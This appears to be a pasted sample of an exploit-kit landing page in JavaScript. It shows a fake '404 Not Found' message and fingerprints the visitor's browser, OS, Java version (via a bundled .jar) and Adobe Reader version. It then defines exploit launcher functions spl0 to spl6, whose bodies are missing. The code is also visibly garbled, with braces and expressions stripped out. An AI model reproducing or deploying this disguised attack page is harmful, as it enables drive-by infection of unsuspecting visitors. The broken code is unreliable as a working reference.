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Created July 19, 2011 23:54
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document.write('<center><h1>404 Not Found</h1></center><hr>');
function end_redirect() {}
var javafile = './games/getJavaInfo.jar';
var jver = [0, 0, 0, 0],
pdfver = [0, 0, 0, 0];
try {
var PluginDetect = {
handler: function (c, b, a) {
return function () {
c(b, a)
isDefined: function (b) {
return typeof b != "undefined"
isArray: function (b) {
return (/array/i).test(
isFunc: function (b) {
return typeof b == "function"
isString: function (b) {
return typeof b == "string"
isNum: function (b) {
return typeof b == "number"
isStrNum: function (b) {
return (typeof b == "string" && (/\d/).test(b))
getNumRegx: /[\d][\d\.\_,-]*/,
splitNumRegx: /[\.\_,-]/g,
getNum: function (b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
return a ? a[0] : null
compareNums: function (h, f, d) {
var e = this,
c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)) {
if (e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length); a++) {
if (g(c[a], 10) > g(b[a], 10)) {
return 1
if (g(c[a], 10) < g(b[a], 10)) {
return -1
return 0
formatNum: function (b, c) {
var d = this,
a, e;
if (!d.isStrNum(b)) {
return null
if (!d.isNum(c)) {
c = 4
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a++) {
if (/^(0+)(.+)$/.test(e[a])) {
e[a] = RegExp.$2
if (a > c || !(/\d/).test(e[a])) {
e[a] = "0"
return e.slice(0, 4).join(",")
$$hasMimeType: function (a) {
return function (d) {
if (!a.isIE && d) {
var c, b, e, f = a.isString(d) ? [d] : d;
if (!f || !f.length) {
return null
for (e = 0; e < f.length; e++) {
if (/[^\s]/.test(f[e]) && (c = navigator.mimeTypes[f[e]]) && (b = c.enabledPlugin) && ( || b.description)) {
return c
return null
findNavPlugin: function (l, e, c) {
var j = this,
h = new RegExp(l, "i"),
d = (!j.isDefined(e) || e) ? /\d/ : 0,
k = c ? new RegExp(c, "i") : 0,
a = navigator.plugins,
g = "",
f, b, m;
for (f = 0; f < a.length; f++) {
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
if (!k || !(k.test(m) || k.test(b))) {
return a[f]
return null
getMimeEnabledPlugin: function (a, f) {
var e = this,
b, c = new RegExp(f, "i"),
d = "";
if ((b = e.hasMimeType(a)) && (b = b.enabledPlugin) && (c.test(b.description || d) || c.test( || d))) {
return b
return 0
getPluginFileVersion: function (f, b) {
var h = this,
e, d, g, a, c = -1;
if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
if (!b) {
return e
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a++) {
if (c > -1 && a > c && d[a] != "0") {
return b
if (g[a] != d[a]) {
if (c == -1) {
c = a
if (d[a] != "0") {
return b
return e
AXO: window.ActiveXObject,
getAXO: function (b) {
var f = null,
d, c = this,
try {
f = new c.AXO(b)
} catch (d) {}
return f
convertFuncs: function (g) {
var a, h, f, b = /^[\$][\$]/,
d = {},
c = this;
for (a in g) {
if (b.test(a)) {
d[a] = 1
for (a in d) {
try {
h = a.slice(2);
if (h.length > 0 && !g[h]) {
g[h] = g[a](g);
delete g[a]
} catch (f) {}
initScript: function () {
var c = this,
a = navigator,
e = "/",
i = a.userAgent || "",
g = a.vendor || "",
b = a.platform || "",
h = a.product || "";
c.OS = 100;
if (b) {
var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
for (f = d.length - 2; f >= 0; f = f - 2) {
if (d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
c.isIE = new Function("return " + e + "*@cc_on!@*" + e + "false")();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if (c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f++) {
if (c.getAXO(j[f])) {
c.ActiveXEnabled = true;
c.head = c.isDefined(document.getElementsByTagName) ? document.getElementsByTagName("head")[0] : null
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isSafari = (/Safari\s*\/\s*\d/i).test(i) && (/Apple/i).test(g);
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
init: function (c) {
var b = this,
a, c;
if (!b.isString(c)) {
return -3
if (c.length == 1) {
b.getVersionDelimiter = c;
return -3
c = c.toLowerCase().replace(/\s/g, "");
a = b[c];
if (!a || !a.getVersion) {
return -3
b.plugin = a;
if (!b.isDefined(a.installed)) {
a.installed = a.version = a.version0 = a.getVersionDone = null;
a.$ = b;
a.pluginName = c
b.garbage = false;
if (b.isIE && !b.ActiveXEnabled) {
if (a !== {
return -2
return 1
fPush: function (b, a) {
var c = this;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
callArray: function (b) {
var c = this,
if (c.isArray(b)) {
for (a = 0; a < b.length; a++) {
if (b[a] === null) {
b[a] = null
call: function (c) {
var b = this,
a = b.isArray(c) ? c.length : -1;
if (a > 0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if (b.isFunc(c)) {
getVersionDelimiter: ",",
$$getVersion: function (a) {
return function (g, d, c) {
var e = a.init(g),
f, b, h;
if (e < 0) {
return null
f = a.plugin;
if (f.getVersionDone != 1) {
f.getVersion(null, d, c);
if (f.getVersionDone === null) {
f.getVersionDone = 1
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
cleanup: function () {
var a = this;
if (a.garbage && a.isDefined(window.CollectGarbage)) {
addWinEvent: function (d, c) {
var e = this,
a = window,
if (e.isFunc(c)) {
if (a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if (a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
winHandler: function (d, c) {
return function () {
if (typeof c == "function") {
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function (a) {
a.winLoaded = true;
if (a.onDoneEmptyDiv) {
winLoaded: false,
$$onWindowLoaded: function (a) {
return function (b) {
if (a.winLoaded) {
} else {
a.fPush(b, a.WLfuncs)
div: null,
divWidth: 50,
pluginSize: 1,
emptyDiv: function () {
var c = this,
a, e, b, d = 0;
if (c.div && c.div.childNodes) {
for (a = c.div.childNodes.length - 1; a >= 0; a--) {
b = c.div.childNodes[a];
if (b && b.childNodes) {
if (d == 0) {
for (e = b.childNodes.length - 1; e >= 0; e--) {
} else {}
DONEfuncs: [],
onDoneEmptyDiv: function () {
var c = this,
a, b;
if (!c.winLoaded) {
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
for (a in c) {
b = c[a];
if (b && b.funcs) {
if (b.OTF == 3) {
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
for (a = 0; a < c.DONEfuncs.length; a++) {
getWidth: function (c) {
if (c) {
var a = c.scrollWidth || c.offsetWidth,
b = this;
if (b.isNum(a)) {
return a
return -1
getTagStatus: function (m, g, a, b) {
var c = this,
f, k = m.span,
l = c.getWidth(k),
h = a.span,
j = c.getWidth(h),
d = g.span,
i = c.getWidth(d);
if (!k || !h || !d || !c.getDOMobj(m)) {
return -2
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
return 0
if (l >= i) {
return -1
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if (!m.winLoaded && c.winLoaded) {
return 1
if (m.winLoaded && c.isNum(b)) {
if (!c.isNum(m.count)) {
m.count = b
if (b - m.count >= 10) {
return 1
} catch (f) {}
return 0
getDOMobj: function (g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChild ? 1 : 0;
try {
if (b && a) {
} catch (f) {}
return b ? c.firstChild : null
setStyle: function (b, g) {
var f =,
a, d, c = this;
if (f && g) {
for (a = 0; a < g.length; a = a + 2) {
try {
f[g[a]] = g[a + 1]
} catch (d) {}
insertDivInBody: function (i) {
var g, d = this,
h = "pd33993399",
c = null,
f = document,
b = "<",
a = (f.getElementsByTagName("body")[0] || f.body);
if (!a) {
try {
f.write(b + 'div id="' + h + '">o' + b + "/div>");
c = f.getElementById(h)
} catch (g) {}
a = (f.getElementsByTagName("body")[0] || f.body);
if (a) {
if (a.firstChild && d.isDefined(a.insertBefore)) {
a.insertBefore(i, a.firstChild)
} else {
if (c) {
} else {}
insertHTML: function (g, b, h, a, k) {
var l, m = document,
j = this,
q, o = m.createElement("span"),
n, i, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
if (!j.isDefined(a)) {
a = ""
if (j.isString(g) && (/[^\s]/).test(g)) {
q = f + g + ' width="' + j.pluginSize + '" height="' + j.pluginSize + '" ';
for (n = 0; n < b.length; n = n + 2) {
if (/[^\s]/.test(b[n + 1])) {
q += b[n] + '="' + b[n + 1] + '" '
q += ">";
for (n = 0; n < h.length; n = n + 2) {
if (/[^\s]/.test(h[n + 1])) {
q += f + 'param name="' + h[n] + '" value="' + h[n + 1] + '" />'
q += a + f + "/" + g + ">"
} else {
q = a
if (!j.div) {
j.div = m.createElement("div");
i = m.getElementById("plugindetect");
if (i) {
j.div = i
} else { = "plugindetect";
j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3) + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
if (!i) {
j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"])
if (j.div && j.div.parentNode) {
j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
if (o && o.parentNode) {
} catch (l) {}
try {
o.innerHTML = q
} catch (l) {}
if (o.childNodes.length == 1 && !(j.isGecko && j.compareNums(j.verGecko, "1,5,0,0") < 0)) {
j.setStyle(o.firstChild, c.concat(["display", "inline"]))
return {
span: o,
winLoaded: j.winLoaded,
tagName: (j.isString(g) ? g : "")
return {
span: null,
winLoaded: j.winLoaded,
tagName: ""
java: {
mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
mimeTypeJPI: "application/x-java-applet;jpi-version=",
classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
DTKclassID: "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",
DTKmimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
forceVerifyTag: [],
jar: [],
Enabled: navigator.javaEnabled(),
VENDORS: ["Sun Microsystems Inc.", "Apple Computer, Inc."],
OTF: null,
All_versions: [],
mimeTypeJPIresult: "",
JavaPlugin_versions: [],
JavaVersions: [
[1, 9, 2, 30],
[1, 8, 2, 30],
[1, 7, 2, 30],
[1, 6, 1, 30],
[1, 5, 1, 30],
[1, 4, 2, 30],
[1, 3, 1, 30]
searchJavaPluginAXO: function () {
var h = null,
a = this,
c = a.$,
g = [],
j = [1, 5, 0, 14],
i = [1, 6, 0, 2],
f = [1, 3, 1, 0],
e = [1, 4, 2, 0],
d = [1, 5, 0, 7],
b = false;
if (!c.ActiveXEnabled) {
return null
if (c.verIE >= a.minIEver) {
g = a.searchJavaAXO(i, i, b);
if (g.length > 0 && b) {
g = a.searchJavaAXO(j, j, b)
} else {
if (g.length == 0) {
g = a.searchJavaAXO(f, e, false)
if (g.length > 0) {
h = g[0]
a.JavaPlugin_versions = [].concat(g);
return h
searchJavaAXO: function (l, i, m) {
var n, f, h = this.$,
q, k, a, e, g, j, b, r = [];
if (h.compareNums(l.join(","), i.join(",")) > 0) {
i = l
i = h.formatNum(i.join(","));
var o, d = "1,4,2,0",
c = "JavaPlugin." + l[0] + "" + l[1] + "" + l[2] + "" + (l[3] > 0 ? ("_" + (l[3] < 10 ? "0" : "") + l[3]) : "");
for (n = 0; n < this.JavaVersions.length; n++) {
f = this.JavaVersions[n];
q = "JavaPlugin." + f[0] + "" + f[1];
g = f[0] + "." + f[1] + ".";
for (a = f[2]; a >= 0; a--) {
b = "JavaWebStart.isInstalled." + g + a + ".0";
if (h.compareNums(f[0] + "," + f[1] + "," + a + ",0", i) >= 0 && !h.getAXO(b)) {
o = h.compareNums(f[0] + "," + f[1] + "," + a + ",0", d) < 0 ? true : false;
for (e = f[3]; e >= 0; e--) {
k = a + "_" + (e < 10 ? "0" + e : e);
j = q + k;
if (h.getAXO(j) && (o || h.getAXO(b))) {
r.push(g + k);
if (!m) {
return r
if (j == c) {
return r
if (h.getAXO(q + a) && (o || h.getAXO(b))) {
r.push(g + a);
if (!m) {
return r
if (q + a == c) {
return r
return r
minIEver: 7,
getMimeJPIversion: function () {
var h, a = this,
d = a.$,
c = new RegExp("(" + a.mimeTypeJPI + ")(\\d.*)", "i"),
k = new RegExp("Java", "i"),
e, j, f = "",
i = {},
g = 0,
for (h = 0; h < navigator.mimeTypes.length; h++) {
j = navigator.mimeTypes[h];
if (c.test(j.type) && (e = j.enabledPlugin) && (j = RegExp.$2) && (k.test(e.description || f) || k.test( || f))) {
i["a" + d.formatNum(j)] = j
b = "0,0,0,0";
for (h in i) {
e = h.slice(1);
if (d.compareNums(e, b) > 0) {
b = e
a.mimeTypeJPIresult = g > 0 ? a.mimeTypeJPI + i["a" + b] : "";
return g > 0 ? b : null
getVersion: function (m, d, l) {
var f, c = this,
e = c.$,
h = c.NOTF,
b = c.applet,
j = c.verify,
i = vendor = versionEnabled = null;
if (c.getVersionDone === null) {
c.OTF = 0;
c.mimeObj = e.hasMimeType(c.mimeType);
c.deployTK.$ = e;
c.deployTK.parentNode = c;
b.$ = e;
b.parentNode = c;
if (h) {
h.$ = e;
h.parentNode = c
if (j) {
j.parentNode = c;
j.$ = e;
var k;
if (e.isArray(l)) {
for (k = 0; k < b.allowed.length; k++) {
if (e.isNum(l[k])) {
b.allowed[k] = l[k]
for (k = 0; k < c.forceVerifyTag.length; k++) {
b.allowed[k] = c.forceVerifyTag[k]
if (e.isString(d)) {
if (c.getVersionDone == 0) {
if (!c.version || b.canTryAny()) {
f = b.insertHTMLQueryAll(d);
if (f[0]) {
c.installed = 1;
c.EndGetVersion(f[0], f[1])
var g = c.deployTK.query();
if (g.JRE) {
i = g.JRE;
vendor = c.VENDORS[0]
if (!e.isIE) {
var q, n, a, o;
o = (c.mimeObj && c.Enabled) ? true : false;
if (!i && (f = c.getMimeJPIversion()) !== null) {
i = f
if (!i && c.mimeObj) {
f = "Java[^\\d]*Plug-in";
a = e.findNavPlugin(f);
if (a) {
f = new RegExp(f, "i");
q = f.test(a.description || "") ? e.getNum(a.description) : null;
n = f.test( || "") ? e.getNum( : null;
if (q && n) {
i = (e.compareNums(e.formatNum(q), e.formatNum(n)) >= 0) ? q : n
} else {
i = q || n
if (!i && c.mimeObj && e.isSafari && e.OS == 2) {
a = e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa", 0);
if (a) {
q = e.getNum(a.description);
if (q) {
i = q
if (i) {
c.version0 = i;
if (c.Enabled) {
versionEnabled = i
} else {
if (!i && g.status == 0) {
i = c.searchJavaPluginAXO();
if (i) {
vendor = c.VENDORS[0]
if (i) {
c.version0 = i;
if (c.Enabled && e.ActiveXEnabled) {
versionEnabled = i
if (!versionEnabled || b.canTryAny()) {
f = b.insertHTMLQueryAll(d);
if (f[0]) {
versionEnabled = f[0];
vendor = f[1]
if (!versionEnabled && (f = c.queryWithoutApplets())[0]) {
c.version0 = versionEnabled = f[0];
vendor = f[1];
if (c.installed == -0.5) {
c.installed = 0.5
if (e.isSafari && e.OS == 2) {
if (!versionEnabled && o) {
if (c.installed === null) {
c.installed = 0
} else {
if (c.installed == -0.5) {
c.installed = 0.5
if (c.jreDisabled()) {
versionEnabled = null
if (c.installed === null) {
c.installed = versionEnabled ? 1 : (i ? -0.2 : -1)
c.EndGetVersion(versionEnabled, vendor)
EndGetVersion: function (b, d) {
var a = this,
c = a.$;
if (a.version0) {
a.version0 = c.formatNum(c.getNum(a.version0))
if (b) {
a.version = c.formatNum(c.getNum(b));
a.vendor = (c.isString(d) ? d : "")
if (a.getVersionDone != 1) {
a.getVersionDone = 0
jreDisabled: function () {
var b = this,
d = b.$,
c = b.deployTK.query().JRE,
if (c && d.OS == 1) {
if ((d.isGecko && d.compareNums(d.verGecko, "1,9,2,0") >= 0 && d.compareNums(c, "1,6,0,12") < 0) || (d.isChrome && d.compareNums(c, "1,6,0,12") < 0)) {
return 1
if (d.isOpera && d.verOpera >= 9 && !b.Enabled && !b.mimeObj && !b.queryWithoutApplets()[0]) {
return 1
if ((d.isGecko || d.isChrome) && !b.mimeObj && !b.queryWithoutApplets()[0]) {
return 1
return 0
deployTK: {
status: null,
JREall: [],
JRE: null,
HTML: null,
query: function () {
var f = this,
h = f.$,
c = f.parentNode,
i, a, b, g = len = null;
if (f.status !== null) {
return f
f.status = 0;
if ((h.isGecko && h.compareNums(h.verGecko, h.formatNum("1.6")) <= 0) || h.isSafari || h.isChrome || (h.isIE && !h.ActiveXEnabled)) {
return f
if (h.isIE && h.verIE >= 6) {
f.HTML = h.insertHTML("object", [], []);
g = h.getDOMobj(f.HTML)
} else {
if (!h.isIE && (b = h.hasMimeType(c.DTKmimeType)) && b.type) {
f.HTML = h.insertHTML("object", ["type", b.type], []);
g = h.getDOMobj(f.HTML)
if (g) {
if (h.isIE && h.verIE >= 6) {
try {
g.classid = c.DTKclassID
} catch (i) {}
try {
var d = g.jvms;
if (d) {
len = d.getLength();
if (h.isNum(len)) {
f.status = len > 0 ? 1 : -1;
for (a = 0; a < len; a++) {
b = h.getNum(d.get(len - 1 - a).version);
if (b) {
f.JREall[a] = b
} catch (i) {}
if (f.JREall.length > 0) {
f.JRE = h.formatNum(f.JREall[0])
return f
queryWithoutApplets00: function (c, a) {
var b =,
try {
if (b && b.lang && b.lang.System) {
a.value = [b.lang.System.getProperty("java.version") + " ", b.lang.System.getProperty("java.vendor") + " "]
} catch (d) {}
queryWithoutApplets: function () {
var c = this,
f = c.$,
g, a = c.queryWithoutApplets;
if (!a.value) {
a.value = [null, null];
if (!f.isIE && {
if (f.OS == 2 && f.isOpera && f.verOpera < 9.2 && f.verOpera >= 9) {} else {
if (f.isGecko && f.compareNums(f.verGecko, "1,9,0,0") < 0 && f.compareNums(f.verGecko, "1,8,0,0") >= 0) {} else {
if (f.isGecko) {
var i, b, h = document;
if (h.createElement && h.createEvent) {
try {
i = h.createElement("div"), b = h.createEvent("HTMLEvents");
b.initEvent("change", false, false);
i.addEventListener("change", f.handler(c.queryWithoutApplets00, f, a), false);
} catch (g) {}
} else {
c.queryWithoutApplets00(f, a)
return a.value
applet: {
results: [
[null, null],
[null, null],
[null, null]
HTML: [0, 0, 0],
active: [0, 0, 0],
allowed: [2, 2, 2],
DummyObjTagHTML: 0,
DummySpanTagHTML: 0,
getResult: function () {
var c = this.results,
a, b;
for (a = 0; a < c.length; a++) {
b = c[a];
if (b[0]) {
return [].concat(b)
canTry: function (d) {
var b = this,
c = b.$,
a = b.parentNode;
if (b.allowed[d] == 3) {
return true
if (!a.version0 || !a.Enabled || (c.isIE && !c.ActiveXEnabled)) {
if (b.allowed[d] == 2) {
return true
if (b.allowed[d] == 1 && !b.getResult()[0]) {
return true
return false
canTryAny: function () {
var b = this,
for (a = 0; a < b.allowed.length; a++) {
if (b.canTry(a)) {
return true
return false
canUseAppletTag: function () {
var b = this,
c = b.$,
a = b.parentNode;
return (!c.isIE || a.Enabled)
canUseObjectTag: function () {
var a = this,
b = a.$;
return (!b.isIE || b.ActiveXEnabled)
queryThis: function (h) {
var g, c = this,
b = c.parentNode,
f = b.$,
a = vendor = null,
d = f.getDOMobj(c.HTML[h], true);
if (d) {
try {
a = d.getVersion() + " ";
vendor = d.getVendor() + " ";
d.statusbar(f.winLoaded ? " " : " ")
} catch (g) {}
if (f.isStrNum(a)) {
c.results[h] = [a, vendor]
try {
if (f.isIE && a && d.readyState != 4) {
f.garbage = true;
} catch (g) {}
insertHTMLQueryAll: function (e) {
var g = this,
n = g.parentNode,
d = n.$,
o = g.results,
q = g.HTML,
h = "&nbsp;&nbsp;&nbsp;&nbsp;",
u = "A.class";
if (!d.isString(e) || !(/\.jar\s*$/).test(e) || (/\\/).test(e)) {
return [null, null]
if (n.OTF < 1) {
n.OTF = 1
if (n.jreDisabled()) {
return [null, null]
if (n.OTF < 2) {
n.OTF = 2
var c = e,
t = "",
if ((/[\/]/).test(e)) {
m = e.split("/");
c = m[m.length - 1];
m[m.length - 1] = "";
t = m.join("/")
var j = ["archive", c, "code", u],
l = ["mayscript", "true"],
r = ["scriptable", "true"].concat(l),
f = !d.isIE && n.mimeObj && n.mimeObj.type ? n.mimeObj.type : n.mimeType[0];
if (!q[0] && g.canUseObjectTag() && g.canTry(0)) {
q[0] = d.isIE ? d.insertHTML("object", ["type", f].concat(j), ["codebase", t].concat(j).concat(r), h, n) : d.insertHTML("object", ["type", f, "archive", c, "classid", "java:" + u], ["codebase", t, "archive", c].concat(r), h, n);
o[0] = [0, 0];
if (!q[1] && g.canUseAppletTag() && g.canTry(1)) {
q[1] = d.isIE ? d.insertHTML("applet", ["alt", h].concat(l).concat(j), ["codebase", t].concat(l), h, n) : d.insertHTML("applet", ["codebase", t, "alt", h].concat(l).concat(j), [].concat(l), h, n);
o[1] = [0, 0];
if (!q[2] && g.canUseObjectTag() && g.canTry(2)) {
q[2] = d.isIE ? d.insertHTML("object", ["classid", n.classID], ["codebase", t].concat(j).concat(r), h, n) : d.insertHTML();
o[2] = [0, 0];
if (!g.DummyObjTagHTML && g.canUseObjectTag()) {
g.DummyObjTagHTML = d.insertHTML("object", [], [], h)
if (!g.DummySpanTagHTML) {
g.DummySpanTagHTML = d.insertHTML("", [], [], h)
var k, a = 0;
for (k = 0; k < o.length; k++) {
if (q[k] || g.canTry(k)) {
} else {
if (a == o.length) {
n.getVersionDone = n.forceVerifyTag.length > 0 ? 0 : 1
return g.getResult()
append: function (e, d) {
for (var c = 0; c < d.length; c++) {
JavaFix: function () {}
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
pluginHasMimeType: function (d, c, f) {
var b = this,
e = b.$,
for (a in d) {
if (d[a] && d[a].type && d[a].type == c) {
return 1
if (e.getMimeEnabledPlugin(c, f)) {
return 1
return 0
getVersion: function (i, j) {
var f = this,
c = f.$,
h, d, k, m = p = null,
g = null,
l = null,
a, b;
j = (c.isString(j) && j.length) ? j.replace(/\s/, "").toLowerCase() : f.mimeType;
if (c.isDefined(f.INSTALLED[j])) {
f.installed = f.INSTALLED[j];
if (!c.isIE) {
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (f.getVersionDone !== 0) {
f.getVersionDone = 0;
p = c.getMimeEnabledPlugin(f.mimeType, a);
if (!p && c.hasMimeType(f.mimeType)) {
p = c.findNavPlugin(a, 0)
if (p) {
f.navPluginObj = p;
g = c.getNum(p.description) || c.getNum(;
g = c.getPluginFileVersion(p, g);
if (!g && c.OS == 1) {
if (f.pluginHasMimeType(p, "application/vnd.adobe.pdfxml", a)) {
g = "9"
} else {
if (f.pluginHasMimeType(p, "application/vnd.adobe.x-mars", a)) {
g = "8"
} else {
g = f.version
m = c.getMimeEnabledPlugin(j, a);
f.installed = m && g ? 1 : (m ? 0 : (f.navPluginObj ? -0.2 : -1))
} else {
p = c.getAXO(f.progID[0]) || c.getAXO(f.progID[1]);
b = /=\s*([\d\.]+)/g;
try {
d = (p || c.getDOMobj(c.insertHTML("object", ["classid", f.classID], ["src", ""], "", f))).GetVersions();
for (k = 0; k < 5; k++) {
if (b.test(d) && (!g || RegExp.$1 > g)) {
g = RegExp.$1
} catch (h) {}
f.installed = g ? 1 : (p ? 0 : -1)
if (!f.version) {
f.version = c.formatNum(g)
f.INSTALLED[j] = f.installed
zz: 0
jver = PluginDetect.getVersion("Java", javafile);
pdfver = PluginDetect.getVersion("AdobeReader");
} catch (e) {}
if (typeof jver == 'string') {
jver = jver.split('.')
} else {
jver = [0, 0, 0, 0]
if (typeof pdfver == 'string') {
pdfver = pdfver.split('.')
} else {
pdfver = [0, 0, 0, 0]
function spl0() {
function spl1() {
function spl2() {
function spl3() {
function spl4() {
function spl5() {
function spl6() {
setTimeout(end_redirect, 6000)
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